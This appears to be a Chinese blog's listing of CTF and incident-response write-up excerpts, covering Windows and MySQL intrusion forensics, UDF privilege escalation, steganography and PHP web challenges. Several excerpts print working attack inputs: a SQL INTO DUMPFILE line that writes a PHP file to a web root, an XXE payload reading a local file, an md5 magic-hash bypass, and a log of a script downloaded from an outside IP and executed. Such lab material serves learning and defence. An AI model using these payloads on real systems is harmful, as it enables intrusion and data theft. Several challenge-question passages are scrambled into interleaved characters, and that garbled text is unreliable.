Posts

windows实战-emlog 基于xp面板的windows应急响应 找 分 分 分 到 析 析 析 黑 黑 黑 黑 客 客 客 客 植 攻 的 的 入 击 隐 挖 成 藏 矿 s 功 账 程 h 的 户 序 e 名 的 l I 称 矿 l P , 池 , 将 域 将 为 黑 名 黑 多 客 , 客 少 隐 将 植 , 藏 黑 入 将 账 客 黑 户 挖 s 客 名 矿 h 称 程 e I 作 序 l P 为 的 l 矿 作 F 池 的 为 L 域 密 A 名 码 F G 称 L 作 作 A 提 为 为 G 交 ( ; 仅 F 提 域 L 交 名 A ; ) G F L 提 A 交 G ; 提 交 ; 找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交; 登入服务器，可以看到xp面板，打开xp面板可以找到网站的根目录位于C:\phpstudy_pro\WWW\WWW ...

Windows evtx 日志文件分析 又是玄机靶场的日志分析题目，这次是windows的evtx的日志 1 2 3 4 5 . . . . . 黑 黑 黑 黑 黑 客 客 客 客 客 的 成 成 成 成 i 功 功 功 功 p 登 登 登 登 录 录 录 录 系 系 系 系 统 统 统 统 后 后 后 后 修 成 重 修 改 功 启 改 了 访 过 了 登 问 几 登 录 了 次 录 用 一 数 用 户 个 据 户 的 关 库 的 用 键 服 用 户 位 务 户 名 置 ， 名 的 将 并 文 最 对 件 后 系 ， 一 统 将 次 执 该 重 行 文 启 了 件 数 多 名 据 次 称 库 重 （ 服 启 文 务 操 件 后 作 名 数 ， 称 据 将 不 库 黑 包 服 客 含 务 使 后 的 用 缀 进 修 ） 程 改 作 I 后 为 D 的 F 号 用 l 作 户 a 为 重 g F 启 值 l 系 提 a 统 交 g 的 值 次 提 数 交 作 为 F l a g 值 提 交 。 evtx不同于linux的日志，他是微软的专有格式，在虚拟机中双击后是以事件查看器的形式打开的 ...

mysql UDF提权 上次做题的时候遇到了各UDF提权没有做出来，遂补习，建立在已经获得基础权限需要提权到mysql的情况下 权限获取 简单罗列一些，这次主要研究UDF提权的手段。 1.sqlmap -os-shell 2.手工dumpfile 3.NDAY webshell 知道网站根目录 有mysqlroot权限 secure_file_priv 为空，无限制 secure_file_priv可以通过show global variables like '%secure_file_priv%';来查询，NULL不允许写入 V s a e r c i u a r b e l _ e f _ i n l a e m _ e p r i v V a l u e SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/www/wwwroot/192.168.56.102_8083/phpinfo.php'; 手动UDF UDF（User Defined Function）顾名思义用户自定义函数，一般形式是用c语言编写的动态链接库，windows为dll，linux为so，所以不准确的说UDF是一种C代码执行 ...

考的是对mysql下渗透方式的熟悉程度 1.黑客第一次写入的shell flag{关键字符串} 2.黑客反弹shell的ip flag{ip} 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx 4.黑客获取的权限 flag{whoami后的值} 黑客反弹shell的ip mysql的渗透我能想到的方法无非是注入，和弱口令接管，先找到日志 root@xuanji:~# find / -name mysql /etc/init.d/mysql /etc/mysql /usr/bin/mysql /usr/lib/perl5/auto/DBD/mysql /usr/lib/perl5/DBD/mysql /usr/lib/mysql /usr/share/mysql /usr/share/php5/mysql /var/lib/mysql /var/lib/mysql/mysql /var/lib/php5/modules/apache2/enabled_by_maint/mysql /var/lib/php5/modules/cli/enabled_by_maint/mysql /var/lib/php5/modules/registry/mysql /var/log/mysql cat以后值得注意的内容是 sh: 1: curl: not found --2023-08-01 02:14:11-- http://192.168.100.13:771/ Connecting to 192.168.100.13:771... connected. HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9 Length: unspecified Saving to: 'index.html' 0K 2.46 =2.0s 2023-08-01 02:14:13 (2.46 B/s) - 'index.html' saved [5] /tmp/1.sh: line 1: --2023-08-01: command not found /tmp/1.sh: line 2: Connecting: command not found /tmp/1.sh: line 3: HTTP: command not found /tmp/1.sh: line 4: Length:: command not found /tmp/1.sh: line 5: Saving: command not found /tmp/1.sh: line 7: 0K: command not found /tmp/1.sh: line 9: syntax error near unexpected token `(' /tmp/1.sh: line 9: `2023-08-01 02:16:35 (5.01 MB/s) - '1.sh' saved [43/43]' 服务器从192.168.100.13下载了一个脚本并运行了cat一下脚本 ...

1 2 3 4 5 . . . . . w 服 不 黑 黑 e 务 死 客 客 b 器 马 留 留 目 疑 是 下 下 录 似 通 了 了 存 存 过 木 木 在 在 哪 马 马 木 不 个 文 文 马 死 文 件 件 ， 马 件 ， ， 请 ， 生 请 请 找 请 成 找 找 到 找 的 出 出 木 到 ， 黑 黑 马 不 请 客 客 的 死 提 的 服 密 马 交 服 务 码 的 文 务 器 提 密 件 器 开 交 码 名 i 启 提 p 的 交 提 监 交 端 口 提 交 查找文件目录可以通过find / -name www来找 ...

入门日志分析 1 2 3 4 5 . . . . . 有 s 爆 登 黑 多 s 破 陆 客 少 h 用 成 登 I 爆 户 功 陆 P 破 名 的 主 在 成 字 I 机 爆 功 典 P 后 破 登 是 共 新 主 陆 什 爆 建 机 的 么 破 了 s I ？ 了 一 s P 如 多 个 h 是 果 少 后 的 多 有 次 门 r 少 多 用 o ， 个 户 o 如 使 ， t 果 用 用 帐 有 " 户 号 多 , 名 ， 个 " 是 如 使 分 多 果 用 割 少 有 " 多 , 个 " 使 分 用 割 " , " 分 割 有多少IP在爆破主机ssh的root帐号 在linux中登入日志为 ...

闽盾杯 复现 部分 logo隐写 zstag使用，很惭愧之前完全没接触过此类工具 excel隐写 execl表格，考的是vba宏的使用 点击查看宏 可以看到一个加密和一个解密，点击解密 就可以看到flag，但很明显是乱的，经过测试对计算机分数进行降序排列即可拿到正确的flag flag{jisuanjichengjijuedingbisaipaiming} 变个样就不认识我了？ 也是个图片隐写，使用zsteg读取可以看到类似base64的信息 他的意思应该是存在冗余数据，那就不用他了，直接010查看 猜测上方应该是base表下方应该是编码后的数据，使用万能解码试试 W9i4WoeEJAy7Un/hV8u/WT870Tq2J6xjKEl= 不行，根据提示是base表出现了问题，base标准表结构应该是ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/= A-Za-z0-9+/= 我们拿到的内容是xyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/所以可以大胆猜测其内容为他为正常base表字母字符的颠倒结构即abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/= 卡住了 问过大佬后得知，并非补全而是跟在后面 xyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/abcdefghijklmnopqrstuvw 我不是二维码 拿到信息，随波逐流梭哈 这题的使用的是AES加密，在做题的时候一直以为的base64的换表，密钥和偏移都为文件名42nudiehheidun24 出题人的上网流量 拿到这道题目的时候第一反应的http，webshell的流量分析做多了有点路径依赖了，这不该，再看看可以看到一些smtp 过滤smtp 很明显的qqmali流量 追踪tcp流 导出为eml后缀文件后用能解析邮件格式的软件打开即可看到doc文件 另存为附件，发现密码，根据提示接收人是吴的qq在闽盾qq群查找 获得密码 217778

R3PHP 如果没有题解我绝对想不到 原题： <?php error_reporting(0); if(strpos($_REQUEST['url'],"http")===0){ $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>$_REQUEST['header']) ); $context = stream_context_create($opts); $file = file_get_contents($_REQUEST['url'], false, $context); // echo $file; # no show for u }else{ echo "hacker!"; } highlight_file(__FILE__); ?> 应该是出题人的人说 First, by reading the code, you can know that it is a blind ssrf, and then you can also pass the header header After casually entering a url, I found that 404 is phpstudy, and I can tell that it is a small skin panel of linux. The code of phpstudy Panel, audit found that all requests go through port 8090: ...

好像有好多题目还没上传，现写上传了的 exx 经典带回显xxe漏洞 照抄payload： <?xml version="1.0"?> <!DOCTYPE as [ <!ENTITY f SYSTEM "file:///flag">]> <user><username>admin&f;</username><password></password></user> 值得注意的是，需要带file伪协议否则带不出来 百万美元的诱惑 源代码 <?php error_reporting(0); $a = $_GET['a']; $b = $_GET['b']; $c = $_GET['c']; if ($a !== $b && md5($a) == md5($b)) { if (!is_numeric($c) && $c > 2024) { echo "好康的"; } else { die("干巴爹干巴爹先辈~"); } } else { die("开胃小菜))"); } 重点是： if ($a !== $b && md5($a) == md5($b)) { if (!is_numeric($c) && $c > 2024) { 第一段做了一个判断，很明显需要做md5碰撞ab传参分别是a=QNKCDZO&b=240610708，第二个使用了is_numeric()函数判断不是数字的同时需要他大于2024，查了一下可以借url编码中的空字符绕过 最后得到 ?a=QNKCDZO&b=240610708&c=2025%20 得到一个文件名字./dollar.php，访问是下一模块 <?php //flag in 12.php error_reporting(0); if(isset($_GET['x'])){ $x = $_GET['x']; if(!preg_match("/[a-z0-9;`|#'\"%&\x09\x0a><.,?*\-=\\[\]]/i", $x)){ system("cat ".$x.".php"); } }else{ highlight_file(__FILE__); } ?> 看的出来通过preg_match过滤的大部分的字符，在网上查了一圈发现了一个神奇的方法，利用$()这三个字符就可以组成，逻辑大致如下 ...

登入挺迷惑的 账户是NSS，密码看了别人题解才知道 不难看出，重点代码是 if ($num != '12345') { if (intval($num) == '12345') { echo $FLAG; } 这里的判定用了intval函数，其常见与强制类型转换，转换时会忽略小数点，同时它的第二个参数可以缺省，也就是说这个函数能完成自动转化 对应关系为 0开头8进制 0x开头16进制 否则十进制 传入12345.123即可